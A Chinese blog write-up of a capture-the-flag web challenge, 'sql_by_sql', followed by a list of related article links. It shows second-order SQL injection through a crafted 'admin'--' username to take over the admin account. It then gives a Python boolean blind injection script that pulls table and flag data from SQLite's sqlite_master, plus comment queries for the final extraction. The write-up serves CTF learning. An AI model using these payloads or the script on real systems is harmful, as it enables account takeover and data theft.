[NSSRound#1 Basic]sql_by_sql

最新推荐文章于 2024-09-13 17:34:05 发布
最新推荐文章于 2024-09-13 17:34:05 发布
阅读量173 收藏 1
点赞数
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129942751
版权

因NSSCTF收费而没有截图。

1.打开环境,随便注册一个用户。

在修改密码的源码处获得提示

<!-- update user set password='%s' where username='%s'; -->

所以注册用户admin'--并修改密码就可以登录admin,在home页面的查询有两种回显,exist或no user,显然是布尔盲注,需要注意的是数据库是sqlite,查询语句不太一样。

SQLite中有一个类似information_schema功能的表sqlite_master

其中有五个字段

    type:记录项目的类型,如table、index、view、trigger

    name:记录项目的名称,如表名、索引名等

    tbl_name:记录所从属的表名,如索引所在的表名。对于表来说,该列就是表名本身

    rootpage:记录项目在数据库页中存储的编号。对于视图和触发器,该列值为0或者NULL

    sql:记录创建该项目的SQL语句

python脚本:

import requests
import time
import string
str = string.ascii_letters + string.digits
url = "http://1.14.71.254:28156/query"
flag=""
while(True):
   for i in range(1,100):
       for x in str:
           data={
               'id':"1 and substr((select name from sqlite_master where type='table' limit {},1),1,1)='{}'".format(i,x),
               'session':'eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZCrlqg.63_LeCoerysTBvwbFFkhos2Kmt4'

           }
           res = requests.post(url=url,data=data)
           time.sleep(0.1)
           if "exist" in res.text:
               flag+=x
               print(flag)
               break
#select flag from flag 获得flag
#select sql from sqlite_master where type='table' and name='flag'爆列

ha0cker
关注
[NSSRound#1 Basic]sql_by_sql - 二次注入+布尔盲注||sqlmap
oZuoShen123的博客
10-06 376
用burpsuite抓包,判断id类型,使用id=1 or 1=1,如果是字符型则会提示不存在,但是这里明显可以执行,说明id是数字型。1、所以先注册名为:admin’–+的用户,这样就可以直接修改admin密码,登录后,获取cookie。——如果这里的url写错了,是查不到的,而且cookie很重要,非admin的cookie无法进行查询。此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话。1、构造sql注入语句,由于sqllite数据库sql的保留字会有所区别。
每日练习-[NSSRound#1 Basic]sql_by_sql
m0_68113265的博客
08-20 115
注册页面尝试进行覆盖admin用户。但是admin'#报错了。id处尝试注入发现存在就回显exist 不存在就回显no user。登录成功,进行修改密码然后登录admin账号。sqlmap直接跑,注入页面为/query。有个查询按钮 bp抓包进行查看。
[NSSRound#1 Basic]
ki10Moc的博客
08-03 615
看了本文会影响您一天的好心情的
NSSCTF Round#1 Basic [nss2022年4月3日个人赛]web的题解
weixin_51458899的博客
04-04 2519
[nss个人赛]basic_check(复现) (83条消息) Nikto安装和使用_半砖的博客-CSDN博客_nikto安装 参考:https://blog.51cto.com/dearch/2053703 单纯复现比较简单 [nssctf个人赛]sql_for_sql 站点功能是: 登录 注册 改密码 登录和注册均没有注入点 考虑改密码的时候会二次注入 结果的确发现了异常,无论是用户名一开始注册的时候加了单引号,还是新密码用了单引号,状态码会报500, 推测改密码的后台sql select p
sql.rar_school database_school management_sql_visual basic schoo
09-21
1. **SQL语言**:SQL是用于管理关系数据库的标准语言,用于创建、查询、更新和删除数据。在这个项目中,学生需要学习如何编写SELECT语句进行数据查询,INSERT语句进行数据插入,UPDATE语句修改数据,以及DELETE语句...
renshixitong.rar.rar_sql_sql server_vb sql_vb sql server
09-24
sql_sql server_vb_sql_vb_sql server"似乎是一个混合的文件命名,它可能代表一个关于人事系统的压缩包,其中包含了与SQL(结构化查询语言)、SQL Server数据库管理系统以及VB(Visual Basic)编程相关的元素。...
Vb_sql.rar_Server_Vb_sql_vb sql_vb sql server_远程访问
09-24
标题“Vb_sql.rar_Server_Vb_sql_vb_sql_vb_sql_server_远程访问”和描述提到了使用VB(Visual Basic)编程语言与SQL Server进行远程访问的源代码。这是一个关于如何构建应用程序,允许用户在局域网内通过VB连接到...
f.rar_SQL_Server_Visual_Basic_
08-11
标题中的“f.rar_SQL_Server_Visual_Basic_”表明这是一个与SQL Server和Visual Basic相关的项目文件,可能是一个使用Visual Basic编程语言开发的.NET应用程序,该应用与SQL Server数据库进行了集成,用于处理电力...
vb.rar_VB SQL_VB SQL 系统_VB+SQL_sql
09-23
1. 数据库连接:VB通过ADODB.Connection对象建立与SQL服务器的连接。 2. SQL查询:VB中的Command对象用于执行SQL语句,可以是简单的查询,也可以是复杂的存储过程调用。 3. 数据绑定:VB的控件可以直接绑定到数据库...
Web】NSSRound#1-20 Basic 刷题记录(全)
uuzeray的博客
04-11 2169
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。
[NSSRound#1 Basic]cut_into_thirds
qq_51447967的博客
04-28 487
题目分析 下载得到一个raw文件,开始内存分析 题目说:flag刀成了三份,我们要把三份找到人后拼接起来得到一个UUID。 首先常规分析镜像版本。 得到镜像的版本是Win7SP1x64 然后查看进程 vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist 主要是LookAtMe.exe这个进程比较可疑 尝试把它dump出来 先利用memdump来dump出dmp格式的文件 vol.py -f ./cut_into_thirds.r
NoSQL之 Redis配置与优化
2201_75549363的博客
09-10 1384
Redis(远程字典服务器) 是一个开源的、使用 C 语言编写的 NoSQL 数据库。Redis 基于内存运行并支持持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 438
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 420
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
一条sql是如何执行的详解
最新发布
边走、边悟、迟早变好
09-13 849
SQL 查询的执行过程分为解析、查询重写、查询规划、查询执行和结果返回五个主要步骤。每个步骤都对应特定的任务,从解析 SQL 到最终返回结果,确保查询尽可能高效地执行听忆.-CSDN博客🎈众口难调🎈从心就好。
被低估的SQL
weixin_61431494的博客
09-03 1859
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
【PostgreSQL教程】PostgreSQL 高级篇之子查询
No8g攻城狮的博客
09-10 422
子查询也可称为内部查询、嵌套查询,指的是在 PostgreSQL 查询中的 WHERE 子句中嵌入查询语句。一个 SELECT 语句的查询结果能够作为另一个语句的输入值。子查询可以与 SELECT、INSERT、UPDATE 和 DELETE 语句一起使用,并可使用运算符如 =、、>=、
HTB-Archetype(winPEAS枚举工具,mssql xp_cmdshell)
weixin_58038441的博客
09-10 1261
我们介绍了impacket中用于sql server连接工具 mssqlcilent,以及winPEAS枚举权限提升工具,以及powershell中下载文件,nc转移管理权,mssql 命令函数 xp_cmdshell 及开放命令。
Visual Basic+SQL Server 实战MIS系统开发
"《Visual Basic+SQL Server MIS 系统开发与应用》是启明工作室编著的一本书籍,由人民邮电出版社于2005年出版。本书重点介绍了利用Visual Basic编程语言和SQL Server数据库开发管理信息系统的实践方法。书中包含8个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值